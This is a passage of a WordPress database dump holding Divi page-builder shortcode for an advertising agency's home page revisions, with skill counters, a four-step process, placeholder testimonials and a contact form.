button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:57:24','2020-08-07 14:57:24','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(493,1,'2020-08-07 14:59:47','2020-08-07 14:59:47','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" 